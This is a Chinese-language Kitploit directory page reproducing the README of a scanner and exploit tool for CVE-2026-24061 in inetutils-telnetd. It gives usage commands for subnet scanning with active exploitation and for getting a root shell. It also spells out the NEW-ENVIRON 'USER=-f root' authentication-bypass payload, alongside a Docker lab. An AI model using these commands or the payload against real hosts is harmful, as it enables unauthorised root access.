Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24061-telnet2root — 扫描器及针对 inetutils-telnetd 中 CVE-2026-24061 的交互式漏洞利用工具,可通过精心构造的 NEW-ENVIRON 协商实现未认证的 root 访问。包含多线程扫描功能及 Docker 实验环境。 | Kitploit
工具/GitHubGitHub/furkankayapinar/cve-2026-24061-telnet2root
漏洞扫描器漏洞利用网络安全渗透测试远程访问工具实验室与实践
GitHubfurkankayapinar/cve-2026-24061-telnet2root

CVE-2026-24061-telnet2root

扫描器及针对 inetutils-telnetd 中 CVE-2026-24061 的交互式漏洞利用工具,可通过精心构造的 NEW-ENVIRON 协商实现未认证的 root 访问。包含多线程扫描功能及 Docker 实验环境。

查看仓库
17个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24061 漏洞扫描器与利用工具

License CVE

👨‍💻 作者: Furkan KAYAPINAR (@FurkanKAYAPINAR)

概述

本仓库包含一个针对 CVE-2026-24061 的漏洞扫描器和一个交互式利用工具。该漏洞影响 inetutils-telnetd(以及其他潜在的 Telnet 实现),原因是其对 NEW-ENVIRON Telnet 选项的处理不当,允许通过 -f root 载荷实现远程预认证访问。

功能特性

  • scanner.py:一个多线程、高效的扫描器,支持单个目标、CIDR 子网和 IP 列表。包含可选的 --exploit 标志,用于验证 RCE。
  • exploit.py:一个健壮的交互式 Telnet 客户端,可自动化利用链,并在成功后为用户提供 root shell。
  • 实验环境:一个 Docker 化的 Ubuntu 环境,运行存在漏洞的 inetutils-telnetd 版本,用于安全测试。

安装

确保已安装 Python 3.x。

root@kitploit:~
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root

## 使用方法

1. 漏洞扫描器

扫描目标是否存在 NEW-ENVIRON 漏洞。

root@kitploit:~
# 扫描单个目标
python3 scanner.py -t 192.168.1.100 -p 1903

# 扫描子网
python3 scanner.py -s 192.168.1.0/24 -p 1903

# 扫描 IP 列表并尝试主动利用(RCE 检查)
python3 scanner.py -l ips.txt -p 1903 --exploit

2. 交互式利用工具

获取交互式 root shell 访问权限。

root@kitploit:~
python3 exploit.py -t 127.0.0.1 -p 1903

实验环境搭建

部署本地易受攻击的环境进行测试:

  1. 进入实验目录:
    root@kitploit:~
    cd lab
    
  2. 构建并启动容器:
    root@kitploit:~
    docker-compose up -d --build
    
    该服务将在端口 1903 上进行监听。

技术细节

该漏洞在 Telnet 协商阶段被触发。通过使用特制的 IS VAR "USER" VALUE "-f root" 子协商数据包响应服务器的 DO NEW-ENVIRON 请求,服务端的 telnetd 进程会被欺骗,将 -f root 标志传递给 login 进程,从而绕过身份验证。

免责声明

[!WARNING]
此工具仅用于教育和授权的安全测试目的。未经授权访问计算机系统是非法且不道德的行为。

下载工具